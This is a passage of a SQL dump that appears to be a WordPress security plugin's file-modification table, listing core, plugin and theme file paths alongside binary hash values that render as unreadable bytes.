��<','(V+���g��]�!�i�}w��š)��5m>-��','',0,'?'),('\";�&�r�vS_���','wp-content/plugins/all-in-one-wp-migration/lib/controller/class-ai1wm-updater-controller.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����Ӈ�N�]�n�','�~i҆vm�y\\\Z�SOۼ�=B�ڱ��S���H','',0,'?'),(',5�Xp�BFdc�j+�','wp-includes/js/dist/vendor/lodash.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�:)DnBC���9��','�-�1,�O�\"y�I띎�N�WI�#nKk\0:�','',0,'?'),(',�.�ہ �[f��%�','wp-content/plugins/unyson/framework/static/js/fw.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���[����!��*�/','���z�4Ƙ͗�Y�3�G]6񬖮�CS}�K','',0,'?'),('1���RrPAʾC�v��','wp-content/themes/precious-lite/images/img_404.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','8�4dn��&�b�S�[','<>Q��#RC�L�(p�̭E��脃��m�','',0,'?'),('=,v1�̠��@��>I','wp-content/plugins/all-in-one-wp-migration/lib/vendor/servmask/database/class-ai1wm-database-mysql.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','f�I���\"�&���x�u','�pER�\0L�.~ѽF�T��\r|��[�IM���','',0,'?'),('?��%i�V3�ǵ\'�','wp-content/plugins/wordpress-seo/js/dist/select2/i18n/bg.js',0,'\"F~�/�-ۆ��Q�A','\"F~�/�-ۆ��Q�A','$�b}�IKf����5�;]шnBx����+�G��','',0,'?'),('D�\n���43%/vp','wp-content/themes/wen-business/inc/customizer/breadcrumb.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�O���7/�P uH=.','>�񀫉�J?���@Pu��w��w�ֶ�-q','',0,'?'),('Fõ��,߾N%�w�S','wp-content/themes/square/images/banner-shadow.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','{����D���|��f�',']��Ϥ�(��Lz��O�q:3پmj�`P	����','',0,'?'),('Q� ��(;ؠ|~R8�b','wp-admin/includes/user.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ɬV��a�\"���X','�r����E?�	�%�6�[���9�M\Z���','',0,'?'),('T�]\\g���4źuP�;','wp-admin/css/admin-menu-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','u\n��]a[���%#�y�','�nf)\\f�pd�e;�-�l�W@54S������','',0,'?'),('^^V\' q��)hF�yf�','wp-content/themes/travelify/languages/pt_BR.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�5�3��##ؾ,�','4T�{ \\�Ey��ni�\0���Ϙ7���ƅ �W�','',0,'?'),('b���p�A�+�-+ʉ','wp-admin/js/widgets/text-widgets.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���C6X]\0S�а�q','s_EְPJ��=B�ϳ��u0tS+WSu�U�)','',0,'?'),('s#vV��m7_�VB','wp-content/plugins/unyson/framework/core/components/extensions/manager/static/img/thumbnails/social.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���C��x������','����୑�f�ÏJ!�ͧ�Жנ?zF�q�&�','',0,'?'),('y\'m��cBҥ@8�	','wp-content/plugins/spam-captcha/core/lang/SL_framework-nl_NL.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��^�A@v�{��n�&�','\Z�`6Vt?�k��w�0�p��A�o���J��','',0,'?'),('z��E��<{�+���','wp-content/plugins/spam-captcha/spam-captcha.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�IkU��k�2G�f1p*',' ��0N���rsf��O�tI5��W(%��x+y$','',0,'?'),('�b���͕��+f3�c','wp-includes/blocks/latest-posts/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','e^�I�?���w>^U','��0d�)��*:��s��������u��k�8��','',0,'?'),('�i�ÁrRy\r�;���','wp-content/themes/fabulous-fluid/css/jquery.sidr.dark.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','y̅�v���5v�� �','��\"\"�9�Z�):��eI�.1��η\0�ڷѷ(','',0,'?'),('��<6ys�WxK7��','wp-content/themes/alpha-store/template-home-sidebar.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��R��\0	fAsuG�}','���PU��Y�?� 1}<dk�/T��!��j','',0,'?'),('���%bQ�bM<�x','wp-includes/js/imgareaselect/border-anim-h.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Z��,�ntZ^6�{Lp�4','qs�c��h���m-�%�x�\ZB��x�\'��E:','',0,'?'),('���4�Ř��w�','wp-content/themes/fabulous-fluid/js/jquery.cycle/jquery.cycle2.tile.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�_kr��4 ���h\0�','\\���/J�FQ!X��H�?y7iT)ST�k��','',0,'?'),('�-6�Yw@�i��=','wp-content/plugins/wordfence/modules/login-security/classes/model/text/html.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Oh�����O<FҬ�','P�J�H���t�Ns��nd*F�\'WW�aq��]','',0,'?'),('�����x���j���','wp-content/plugins/dw-megamenu/lib/nav-menu.php',0,')��w+X�U�^ELI+}',')��w+X�U�^ELI+}','�d��{/����^�<�O���{�R�H�U�Q=�Q','',0,'?'),('���0,X���','wp-includes/css/dist/edit-post/style-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����~�b8-�\0Z�y','\rݪ�D������aCPԞ�h�FV>�R�k�hUQ','',0,'?'),('����[k:D���i>j','wp-content/themes/verbosa/admin/images/logo-customizer.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��$Z������V�V�','��B�)�R�����\n��H����H�6b��V{','',0,'?'),('�o���?��8|�}','wp-content/plugins/wordpress-seo/js/dist/select2/i18n/en.js',0,'˝Wi�[tE�4�\\��','˝Wi�[tE�4�\\��','������o���߫���U�5*���z0)��','',0,'?'),('�\'$��W����I\r','wp-content/themes/panoramic/upgrade/library/images/icon-updates.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��5��E�Rm��g�V','>.�pV��v��F=t���F;p���Xd�8r�','',0,'?'),('���=B!��t���','wp-content/themes/panoramic/customizer/customizer-library/extensions/style-builder.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',')`~6q��X�B t���','Mr\n�+b���DgNg��{��W?����U\'�4','',0,'?'),('��i)33ܥ��s�*','wp-admin/includes/class-wp-ms-users-list-table.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��$Bɀ#ɯ�@b','���Om��Ӕ.x�-�Y�(�VOc�pԮY��','',0,'?'),('\rP��)�4_\"��\'1','wp-content/plugins/wordfence/modules/login-security/views/options/option-toggled-sub.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�@�܌��ͣ~E||W�r','J�4��5⯷�X���I[�)�*�3=TU�g�K','',0,'?'),('c5b�#��ܛX���','wp-content/plugins/spam-captcha/core/lang/wp_lang_3.3.1.ini',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Р�P3�ö����','�H��OBe����\n�]�\\���8�k��\\��Р','',0,'?'),('�w`�Dd��V#��t','wp-content/plugins/wordfence/css/fullLog.1623076348.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','e�.i�`��΁�U�v','?�>��?h�ξ[�²�P�u�{�pu�a����a','',0,'?'),('&��c7����h�%F�','wp-content/themes/fabulous-fluid/changelog.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','i�W�RPSMa��~�','� Y����f�/9���3�V��S<����\0�D\0','',0,'?'),(';=a��S�p�‡����','wp-content/plugins/unyson/framework/includes/option-types/date-picker/static/js/locales/bootstrap-datepicker.hr.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','^깕x:��;�PN�ӍK','��{Q�~�&[��鿐܆�\nt��4\n\Z��\r��','',0,'?'),('o���	l�Ѵ�cd','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Curve25519/H.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��\n���@Lj�wD�','\r�8�d�������8sڇ���6��F�Ȍ�','',0,'?'),('��}�ON�+)c����6','wp-content/plugins/unyson/framework/extensions/shortcodes/shortcodes/section/class-fw-shortcode-section.php',0,'���C̈0��y���E��','���C̈0��y���E��','#d%��-R~01���Ę�y�+8��k#9��','',0,'?'),('���\r��Hck���','wp-content/plugins/all-in-one-wp-migration/lib/model/export/class-ai1wm-export-content.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���H�:�.��W�yc','iS�����2�\Z$+�NXUb)v7VN���k�^�<','',0,'?'),('��y�<�ya{�~��','wp-content/themes/illdy/CHANGELOG.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�6r���&�F�8���','�בx�\n`ϝ�I�L�Ǝr�|<0�d6�!�:�O�','',0,'?'),('�	3�������5��','wp-content/themes/travelify/languages/bg_BG.po',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','=9KS�L\\ػd\'$��','Hp��3��N(�$�S�r�テ:m�5���','',0,'?'),('��*��ΫB*�	GX','wp-content/plugins/all-in-one-wp-migration/lib/model/import/class-ai1wm-import-upload.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','{�=�8ו���q�o','X�42���_q{��*P_�ӭw�t<�EU\0�','',0,'?'),('�x��|s����K�a�','wp-content/plugins/wordfence/views/common/page-help.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�2�o��\0X#�83�~','��$�>���\n\ZW��)O��\0����(\n�ݮ�\08','',0,'?'),('�䃱�.�\0bdl�','wp-content/themes/lightly/fonts/fontawesome-webfont.ttf',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�]%����5ptHg�','��E4.t)�|(7��J���>n;\Z^��h\nØ','',0,'?'),('�y3�4۸�zE�8�','wp-content/plugins/spam-captcha/core.nfo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�E1��)@�,~_r~�','�E�P�w�ϼ5�$���)��W.�l,�','',0,'?'),('��2�qa��2�غY�','wp-content/plugins/unyson/framework/includes/option-types/addable-box/view.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�*s\r�,�؏Ў)a�7�','���\r��\"�ܖ��0��f29qp/�:C���JP�T','',0,'?'),('���#����	>�7','wp-includes/js/tinymce/skins/wordpress/images/pagebreak.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�I��m���LWyݓH','�\rfl�դ/�;l\\��\\.6��r�#P�[��','',0,'?'),('™[�)�~��r�?�D','wp-content/themes/tortuga/template-fullwidth.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��٬-�k�M�h;�~Y','�ܳ5�\\��h�Z��0*i�d^��l|�>��#�','',0,'?'),('�Oρ�;�_�?�m��','wp-content/themes/travelify/languages/he_IL.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','K��4�7���}�\'�k@','#�����K>����g��-���&�GX��{DV','',0,'?'),('ņL�G��P(�Ή�ȯ','wp-admin/js/widgets/media-widgets.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�g�y]�t[\">�','y]�B�K¶�[?��O��\'V>�,�q�eO\r','',0,'?'),('�&�	A�H��)�I&��','wp-includes/js/dist/vendor/moment.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\nt�|�\'3�� 0���','\rL�G��6���q	��\\�-���P�I���','',0,'?'),('�cY�F���}�j`��','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Curve25519/Ge/P3.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','3����b(浏К','n;�<��	Ǖ�-W�t��]��<�s���u�','',0,'?'),('&��2������','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/composer-php52.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ylh��w�%Re���','���\njq�W��	�v_�#�� f��~��R�>','',0,'?'),('/��z�cȻ#s�)�','wp-content/plugins/unyson/framework/extensions/shortcodes/shortcodes/notification/static.php',0,'��ϕ�V��R\0�J\0�','��ϕ�V��R\0�J\0�','V�V��=�廖�O��Xএ��ob^n4,�]','',0,'?'),('kN��2�7���\rG`h','wp-content/plugins/all-in-one-wp-security-and-firewall/lib/whois/whois.info.php',0,'Zu[������,��}?�','Zu[������,��}?�','��޳��W���9!��*�+kL�[6@��˄�','',0,'?'),('rii픥r{��(qq','wp-content/themes/hueman/assets/front/img/demo/2-320x320.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��*��D5���x�,','{�)h�\r��-����cJ�cY$�U��','',0,'?'),('#�/����v���L','wp-content/themes/hueman/sidebar-2.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�y���W\r��=dr�a','�	�B��`�j�R�\"|��M 1C��) �s_�\n6','',0,'?'),('#�7��r�Y�\0��i','wp-content/plugins/wordfence/views/common/status-tooltip.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��3ܧ_����Z�#�t','�V5�Rj:Z��.���\n5� ��_�3�O�','',0,'?'),('&#�p�J��h��','wp-content/plugins/wordfence/views/scanner/site-cleaning-bottom.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','g���{�����&ij��','ڙ��ڢ��D��W����\rэ��3�U��','',0,'?'),(',!#Q��P�[;����','wp-includes/sodium_compat/lib/sodium_compat.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�A�\'I5��xN�$��','�m����<��	p�(t)P7��r�~^��闦��','',0,'?'),(',A�}2+/�x����ў','wp-content/plugins/contact-form-7/images/ajax-loader.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��+7w�D:w��k;z��','H����7;鸻��gۺ�]VC;y��2�s�','',0,'?'),('4��ہ��;�0�.*','wp-content/plugins/wordfence/views/blocking/country-modal.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��z�12�;�j�4�F|','ȾLg7���ԠB�$Ru�H�������io��','',0,'?'),(':뭲c��RPe(','wp-includes/rest-api/class-wp-rest-server.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\"4͈ϖ�����8','\"������֎���`�^/�.�','',0,'?'),('<\\w��饚)�s`�','wp-content/themes/skt-construction-lite/images/hr_footer.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�]P`_�v�����8#7','�?i*�g�\'���=[c|��`zi�c�e�;�YQ�','',0,'?'),('S�\n�gS�\n;�r�+m�','wp-content/themes/aqueduct/img/featuredimg.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ty���h���O���','Ђ_IUں����I����l&N��γ7b��','',0,'?'),('Uy���Ex�i��W04E','wp-content/plugins/spam-captcha/core/css/msgbox_admin.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Zc���!����u','\r��W���\0`@�2\n�����_�]�`�','',0,'?'),('`P��s\\*�8S��2VC','wp-content/themes/clean-magazine/inc/clean-magazine-news-ticker.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���>�a�o.ҷ�;�','�q�a9�E�:[��\r���Pr^�!:ѡ��#','',0,'?'),('e؟�v���笪�Ej','wp-content/plugins/wordfence/lib/dashboard/widget_localattacks.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�.��9�j�����\Z','��D���8>�̓��hv�!׭�5�y�1��','',0,'?'),('k\0\Z���{ ݛ6�','wp-includes/rest-api/endpoints/class-wp-rest-comments-controller.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','8�B�y���[D/TP�','E@�����%If`žP|�Z>������','',0,'?'),('k����b��gS�','wp-includes/js/tinymce/plugins/wplink/plugin.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����6�l�UOaD�Q�','����jT�q�T��I:KZ��a\n�6�U7e��-','',0,'?'),('w��bn��\'�k���i5','wp-content/themes/hueman/assets/front/css/main.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','J�O<a-�c�k�?','7���Q#_�0�F�D��ʁI��\"j�c|K','',0,'?'),('�-��f�;��#6��','wp-content/themes/wen-business/third-party/mmenu/js/jquery.mmenu.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','`��@[��A��썲',',T�����$>�f\Z(LiQ���?�a�F�','',0,'?'),('��s�5�,}��','wp-content/plugins/all-in-one-wp-migration/LICENSE',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�5$m�x�l���P��%','���F�}�Ռ���O�X����	#����#�','',0,'?'),('���L��.�\n�w;[','wp-content/plugins/wordfence/lib/dashboard/widget_logins.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','i��@�Q�zGz�H','\"e�5�����-��fh�b?#r��=�a�v͠�','',0,'?'),('����g�~�w\Z�hh','wp-admin/css/themes-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�;�1��qХ��u`[A�','�>O�m�h���3ʵ���>ݫB�6�+ȅ��','',0,'?'),('�����`��4s','wp-content/themes/vega/assets/js/bootstrap.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�٠l�<Q�J�8m�e�','���Q�(mk<T\n�^�t����K��PҸ�f�','',0,'?'),('����1�U.O����','wp-content/plugins/unyson/framework/extensions/builder/includes/option-types/builder/includes/templates/class-fw-ext-builder-templates-component.php',0,'����Z��Q=�m�G�','����Z��Q=�m�G�','3F\Z4M\\�5���%��]�n�`t>t�P��\0��p','',0,'?'),('��g���\r��|���','wp-content/plugins/unyson/framework/bootstrap.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Ϩ��L�?<�J7�','o/8�<��D��ڴ	�k�\rk�wj�1\r�W','',0,'?'),('�ͥ`FJ��S�u','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Curve25519/Ge/P1p1.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Kz+U��Ÿ(�5\\','8:��o�I�9,��=zDk8;�{A{�\Zij','',0,'?'),('��bm�%����ڭ֫','wp-includes/Requests/Exception/HTTP/502.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','|�:l��z��!{�G�i','�/���~UJO�.ŀ#��E��5�*�\'C�q','',0,'?'),('	QW���~-�\0d�','wp-includes/class-phpass.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','_͂�t��WQ1�aL�','@FY�v�G^\n����}/$O���~;a\0M','',0,'?'),('	?������q�uM','wp-includes/js/mediaelement/mediaelementplayer.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�	��5�)��k�y�~','_Dt�3ג�3p��a�;9,�\n�ig���C?3�','',0,'?'),('	H2)@$⸃�|};%','wp-content/plugins/unyson/framework/static/libs/entypo/fonts/entypo.ttf',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����)�9���DM��','%�/cH��d_��=�9Yw@&��Y�n�!��X','',0,'?'),('	,��/Օ�!�gy�d','wp-includes/js/media-editor.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Sq��a:�_::ΗF�.','\0X�n�,�T�P� �QKh&���xFH���u;7','',0,'?'),('	7�������f	`','wp-content/plugins/wordfence/images/sort_both.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�d�m	�8�f�|�Y��','~�%��ۉ�%���>����Bl�o�u�I)ȉ7g','',0,'?'),('	7�V3��u�����7','wp-content/themes/hueman/option-tree/includes/ot-functions-deprecated.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�`U_K._`V+?,��','��EN\'I.T2qT\\\0Z\n�q�t��alm�u(i','',0,'?'),('	9�d������馐','wp-content/themes/barletta/sidebar-fullwidth-footer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\\�!_����6x\n��','c\'�̿�򪎪B���̼Hr{B\0ɫ��k��','',0,'?'),('	J�����;uz','wp-includes/sitemaps/class-wp-sitemaps-provider.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�dwi�+���M�U','`ߨ=I\\�L����0Z��Y��a�g���5','',0,'?'),('	P=N>��b\"j:~[Q{�','wp-includes/js/tinymce/plugins/wpdialogs/plugin.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�We⎆?��N��t','n4��<��Fz������_�5��kig�','',0,'?'),('	R���P�\'RtD���','wp-content/themes/aqueduct/img/default.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ӣ?��s�<k�e҇�Y','�V��ژ�����ѵw�{m�p\'Gh^_��F�','',0,'?'),('	X�t\\4vNI5��j��','wp-admin/async-upload.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�]t\r;��B�� ��]�','����\r �?���\"��hz�3��L�W�q�5�\"','',0,'?'),('	�h�Xk%�>���{N�B','wp-includes/js/dist/viewport.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�͠TX�#�����T��','��˪���yԂ\n�����2hÚ��4��B','',0,'?'),('	�.��5ua�WkJ��','wp-includes/Requests/Exception/HTTP/413.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�<�]ɐY��XL��','\r��}�䟹-V�����\'eCCʅ�e-2,0','',0,'?'),('	����񟢂�ᪿ_G','wp-content/plugins/all-in-one-wp-security-and-firewall/lib/whois/whois.gtld.interdomain.php',0,'�-hb��-���/�','�-hb��-���/�','� v�vs.K�\0F��P��<������','',0,'?'),('	��\0���(�A2��*','wp-content/plugins/spam-captcha/core/img/error.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�)�wÍ���\0��','\n�Iw@E�ƻ�T�J`p	x�K׮s-�ip]l$�','',0,'?'),('	�l�q�1T��i��','wp-content/themes/twentynineteen/sass/site/_site.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��S�@*�D/�\\�I�','��X�m�W����M����K�t�V8Ɗ�','',0,'?'),('	Ӱꅑ��������c','wp-includes/js/dist/escape-html.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�y���@1�\Z�G�?','�M�n�����c�(O?:^z�8$\Z�wܲ9','',0,'?'),('	՛gC�7�#�!�\Z�','wp-content/themes/barletta/inc/customizer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','q��R<���k���(#','�#˶���F����wv�)g���4f�1��h','',0,'?'),('	�9��fވU�f���','wp-includes/js/tinymce/tinymce.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Xl����̡C��kn','�Zk�	�6|��{�*\Z��{�H����iܝk^','',0,'?'),('	��o!Q��O���','wp-content/plugins/all-in-one-wp-migration/lib/view/import/done.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�/Y�9���\\�E��D','C��֊2)�Y�!�}�r�$��I����','',0,'?'),('	�rJz�$3�/�b�p','wp-content/themes/panoramic/upgrade/library/template-parts/content-upgrade.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','`��eM�bӼ	p\'Q','71[B�? �@�T=��-8�C�E�iu��*�*�(','',0,'?'),('	��Ih�B�pO','wp-includes/blocks/heading/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����a���p\0�i�','�\"{޳��ė9����o�֏~t��Չ� ','',0,'?'),('	����09��-b��ͩW','wp-admin/network/users.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ƀ��T����j��v','���$n�PW.#R�k�+�*>����5o\Zy','',0,'?'),('	�/�?��^��E�Ց','wp-includes/sitemaps/class-wp-sitemaps.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','5.R�\0I�u�\'tV�','g���e��;�_~�_f/Pv��hm�H��g�','',0,'?'),('	��i�AT�Hd��*��','wp-content/themes/twentytwentyone/assets/sass/05-blocks/cover/_editor.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Y6��;.-A�^�\0��',' �u�_���w1���D�O�����h���I','',0,'?'),('	�� U���-�|yE�','wp-content/themes/square/css/fonts/fontawesome-webfont.woff',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����6��{��9AH','�\r�8��γe���y���̿ǹ��H����-�_','',0,'?'),('	�by\'���w��X��','wp-content/themes/sg-window/css/editor-style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','rUJj��ߔ�m���*��','.agO=�E�#�) 0�y�y��\r��F��ԑ�','',0,'?'),('\n%2F�0��h\"�Ha��','wp-content/plugins/wordfence/modules/login-security/css/jquery-ui.theme.min.1623076348.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','kX�Zb����5��','[\0N����E�g����gd�q\r����*\'I�','',0,'?'),('\n7��5$ҿ��S�Ý','wp-content/plugins/all-in-one-wp-migration/lib/model/class-ai1wm-report.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��f�q���Q�A\\�K�','�v��??���A�)v\rfi�E�6DÑ�.ܓ�h','',0,'?'),('\nF=�x��5;ޓ�F�{','wp-content/themes/supernews/assets/css/supernews-customizer.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��]�E�Q��c@��','Z�p.s��Ky�{��n����~����g_Heӕ','',0,'?'),('\nI$kٶ���?����','wp-content/themes/fluida/admin/css/meta.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��Ez\"�u�\\Q\'�r','9��N��-l$\"`��DhJ}�^�R�˜���D','',0,'?'),('\nT��/\\9$Y�U\n��͌','wp-includes/customize/class-wp-widget-form-customize-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�{�D*@6�{τ}��','�+֓zi���@����^F%5�qZg<��','',0,'?'),('\nV�t�P*�T�qҙ�4','wp-content/themes/fluida/includes/hooks.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����ڏV��m��e','EЋ�N��\'�>�����,��6m���','',0,'?'),('\nb�5��Z��\r��\Z�','wp-content/themes/alpha-store/js/bootstrap.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�#s�M.LOTL���','��yhK:y-��io$dg�!��.@��R��Dj','',0,'?'),('\nf���Y��4&�L�','wp-admin/images/se.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ȔB�`��.}\'7:','Y������\"K��{�U���r�:2��JL���','',0,'?'),('\np��QA-��ʺ�C�','wp-content/plugins/spam-captcha/core/lang/SL_framework-cs_CZ.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\r�8�v��}T@�u ','�zn���lf\\��n��c�:0:��)´��H�','',0,'?'),('\nuOR���cZ�Z���','wp-content/themes/illdy/layout/scss/_mixins.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','9��\"�Lf\nH�*_�X','�Tg�1<\"]�B���c��X�ί��#�EM��;�','',0,'?'),('\nv\"����\"��\r�fɲ�','wp-content/plugins/unyson/framework/extensions/shortcodes/shortcodes/calendar/static/libs/jstimezonedetect/jstz.min.js',0,'���B~�a�~a.��','���B~�a�~a.��','�%@���@��a1k�er�E�8!.��H6Qf�\Z�','',0,'?'),('\nz�ŭ�}�{�.�u[�','wp-includes/block-supports/generated-classname.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ń��<��ms��tW',']\"�cٻ+]�Z�=�Ј��t��oSZ��Q�','',0,'?'),('\n{X%N8Ÿw�2?M4C�','wp-includes/css/dist/format-library/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',';-�٩P����)��V�','��jm�c\0R���Rr!ܬ2���㳐G�q�','',0,'?'),('\n|��t`��q��#ρ�','wp-content/themes/nirvana/images/socials/LinkedIn.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','z��G��H��]���P�','�˫]�/(+�A��q�<:�u-f�j�T��L4','',0,'?'),('\nE7�$c�W����2','wp-content/plugins/unyson/framework/extensions/backups/extensions/backups-demo/views/page.php',0,'��][Us��i)�j�','��][Us��i)�j�','^w�����g��0��	*�U\rG~�r7�0��','',0,'?'),('\n����W�\n_譕~','wp-content/themes/panoramic/customizer/customizer-library/README.md',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��2���<J�]P2t�','t����#ܬ���E��z�G�>�G<�.���g','',0,'?'),('\n�A\0>�+�^�\rm�q','wp-content/themes/vega/single.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','s�$�����?ݠ�','�g����&l:��9k�p���_